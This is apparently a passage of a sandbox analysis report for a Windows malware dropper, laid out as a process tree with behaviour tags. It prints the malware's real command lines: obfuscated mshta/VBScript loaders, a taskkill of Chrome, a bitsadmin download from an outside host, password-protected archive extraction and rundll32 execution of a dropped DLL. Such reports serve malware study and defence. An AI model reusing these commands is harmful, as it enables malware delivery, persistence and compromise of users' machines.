C:\Users\Admin\Pictures\Adobe Films\UDl5MrZhovzJ9aalPEClXxwq.exe"C:\Users\Admin\Pictures\Adobe Films\UDl5MrZhovzJ9aalPEClXxwq.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:5512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 4928⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4496
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6Dc4QkJcH_bc6k4XPPf58CgI.exe"C:\Users\Admin\Pictures\Adobe Films\6Dc4QkJcH_bc6k4XPPf58CgI.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5276
-
-
C:\Users\Admin\Pictures\Adobe Films\zOSiw22fXWUlLyCSO8v9nq6z.exe"C:\Users\Admin\Pictures\Adobe Films\zOSiw22fXWUlLyCSO8v9nq6z.exe"7⤵
- Executes dropped EXE
PID:5228
-
-
C:\Users\Admin\Pictures\Adobe Films\W30vm3LUtOHOLL7zBnVYdAYg.exe"C:\Users\Admin\Pictures\Adobe Films\W30vm3LUtOHOLL7zBnVYdAYg.exe"7⤵
- Executes dropped EXE
PID:5216
-
-
C:\Users\Admin\Pictures\Adobe Films\maDKjDOdzVgHa7Y8JpsfZClW.exe"C:\Users\Admin\Pictures\Adobe Films\maDKjDOdzVgHa7Y8JpsfZClW.exe"7⤵PID:5208
-
-
C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5200
-
-
C:\Users\Admin\Pictures\Adobe Films\7lIFfIAq75ayPS1l79AzqZbx.exe"C:\Users\Admin\Pictures\Adobe Films\7lIFfIAq75ayPS1l79AzqZbx.exe"7⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 6728⤵
- Program crash
PID:4996
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5184 -
C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"8⤵PID:3456
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AAsjqRognrs5OHbgENK9auj7.exe"C:\Users\Admin\Pictures\Adobe Films\AAsjqRognrs5OHbgENK9auj7.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5176 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵PID:3500
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
PID:4196
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cewNSWFaXogGyGjuphJS2DKK.exe"C:\Users\Admin\Pictures\Adobe Films\cewNSWFaXogGyGjuphJS2DKK.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5168
-
-
C:\Users\Admin\Pictures\Adobe Films\8NH7scC85tXvro4oKnjmDNxQ.exe"C:\Users\Admin\Pictures\Adobe Films\8NH7scC85tXvro4oKnjmDNxQ.exe"7⤵PID:4524
-
-
C:\Users\Admin\Pictures\Adobe Films\xiByWaoG_7rk4c36MvEOU6HY.exe"C:\Users\Admin\Pictures\Adobe Films\xiByWaoG_7rk4c36MvEOU6HY.exe"7⤵PID:4588
-
C:\Users\Admin\Documents\UWZiUOJl0LZG66f2pahI0uWq.exe"C:\Users\Admin\Documents\UWZiUOJl0LZG66f2pahI0uWq.exe"8⤵
- Checks computer location settings
PID:7348 -
C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"9⤵PID:4652
-
-
C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"9⤵PID:4908
-
-
C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"9⤵PID:596
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:6560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Executes dropped EXE
- Kills process with taskkill
PID:5368
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7564
-
-
C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"9⤵PID:2976
-
-
C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"9⤵PID:5828
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:7484
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:196
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵PID:6696
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵PID:7420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵PID:7820
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵PID:2084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵PID:7156
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵PID:200
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
- Loads dropped DLL
PID:5668
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Hb6h5uEbcZ1THC4k6kC2dsk3.exe"12⤵
- Kills process with taskkill
PID:4900
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"9⤵PID:6468
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe" -u10⤵PID:4676
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"9⤵
- Loads dropped DLL
PID:4256 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:6732 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1416 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffbc68adec0,0x7ffbc68aded0,0x7ffbc68adee012⤵
- Loads dropped DLL
PID:5752
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1984 /prefetch:812⤵PID:1964
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1668 /prefetch:812⤵PID:5496
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:212⤵PID:7460
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2588 /prefetch:112⤵
- Checks computer location settings
PID:7396
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2536 /prefetch:112⤵
- Checks computer location settings
PID:208
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:212⤵PID:8772
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1576 /prefetch:812⤵PID:9012
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=3616 /prefetch:812⤵PID:2956
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2168 /prefetch:812⤵PID:5528
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2396 /prefetch:812⤵PID:9064
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1012 /prefetch:812⤵PID:6648
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2096 /prefetch:812⤵PID:8876
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"9⤵PID:3220
-
C:\Users\Admin\AppData\Local\Temp\is-V552B.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp"C:\Users\Admin\AppData\Local\Temp\is-V552B.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp" /SL5="$603CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\is-AEATC.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-AEATC.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:1256 -
C:\Program Files\Windows Sidebar\APFVDEXANK\foldershare.exe"C:\Program Files\Windows Sidebar\APFVDEXANK\foldershare.exe" /VERYSILENT12⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\47-b7244-e17-172a8-3e857febf6646\Lesavaeshiky.exe"C:\Users\Admin\AppData\Local\Temp\47-b7244-e17-172a8-3e857febf6646\Lesavaeshiky.exe"12⤵
- Executes dropped EXE
- Checks computer location settings
PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\8c-8e61b-387-3d989-f9981205e216a\Dyduhycika.exe"C:\Users\Admin\AppData\Local\Temp\8c-8e61b-387-3d989-f9981205e216a\Dyduhycika.exe"12⤵PID:7736
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe /eufive & exit13⤵PID:692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe /eufive14⤵PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exeC:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe /qn CAMPAIGN="654"14⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7880 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634167691 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵PID:8680
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe & exit13⤵PID:6236
-
C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exeC:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe14⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe"C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe" -u15⤵PID:6728
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe /mixfive & exit13⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe /mixfive14⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe /S & exit13⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:7948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:3220
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:2576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:8640
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:2956
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:8940
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
PID:7516
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
PID:5528
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:3964
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:8928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:8948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:4444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:4264
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd15⤵PID:9044
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd16⤵
- Drops file in System32 directory
PID:2724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:5704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:3924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:3804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:1272
-
-
